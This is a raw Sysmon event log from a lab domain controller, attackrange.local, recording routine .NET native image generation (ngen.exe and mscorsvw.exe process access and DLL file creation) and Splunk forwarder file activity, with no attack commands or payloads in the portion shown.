21:06:32.307{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A258-60D3-D804-00000000CF01}5916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000022069Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:32.228{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A258-60D3-D704-00000000CF01}4936C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022068Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:32.213{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A258-60D3-D704-00000000CF01}4936C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022067Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:32.213{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A258-60D3-D704-00000000CF01}4936C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000022066Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:32.166{4DB9351A-A258-60D3-D604-00000000CF01}1112C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\458-0\System.Web.DynamicData.Design.dll2021-06-23 21:06:32.166 10341000x800000000000000022065Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:32.088{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A258-60D3-D604-00000000CF01}1112C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022064Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:32.072{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A258-60D3-D604-00000000CF01}1112C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022063Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:32.072{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A258-60D3-D604-00000000CF01}1112C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000022062Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:31.994{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A257-60D3-D504-00000000CF01}6664C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022100Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:33.744{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A259-60D3-DF04-00000000CF01}4360C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022099Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:33.728{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A259-60D3-DF04-00000000CF01}4360C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022098Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:33.728{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A259-60D3-DF04-00000000CF01}4360C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000022097Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:33.682{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A4D7CA9AE615BF71FDD46150DA116390,SHA256=CD41B4EF941F8F4B29EF5BE5707B458CACA7D59B6D5A96FA409969288E50AA89,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022096Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:33.651{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A259-60D3-DE04-00000000CF01}4476C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022095Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:33.635{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A259-60D3-DE04-00000000CF01}4476C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022094Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:33.635{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A259-60D3-DE04-00000000CF01}4476C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000022093Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:33.557{4DB9351A-A259-60D3-DD04-00000000CF01}5976C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1758-0\System.Web.Extensions.Design.dll2021-06-23 21:06:33.557 23542300x800000000000000022092Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:33.541{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0A03804A82A0500DB6DF80786DBA541,SHA256=8E4D1DE046468109E72C7B2221C3D9C8E785D7B1017D505F67B92B2B8924B931,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022091Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:33.135{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A259-60D3-DD04-00000000CF01}5976C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022090Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:33.119{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A259-60D3-DD04-00000000CF01}5976C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022089Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:33.119{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A259-60D3-DD04-00000000CF01}5976C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000022088Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:33.041{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A259-60D3-DC04-00000000CF01}7020C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022087Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:33.041{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A259-60D3-DC04-00000000CF01}7020C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022086Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:33.041{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A259-60D3-DC04-00000000CF01}7020C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000022111Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:34.978{4DB9351A-A25A-60D3-E104-00000000CF01}6252C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\186c-0\System.Web.RegularExpressions.dll2021-06-23 21:06:34.978 10341000x800000000000000022110Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:34.853{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A25A-60D3-E104-00000000CF01}6252C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022109Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 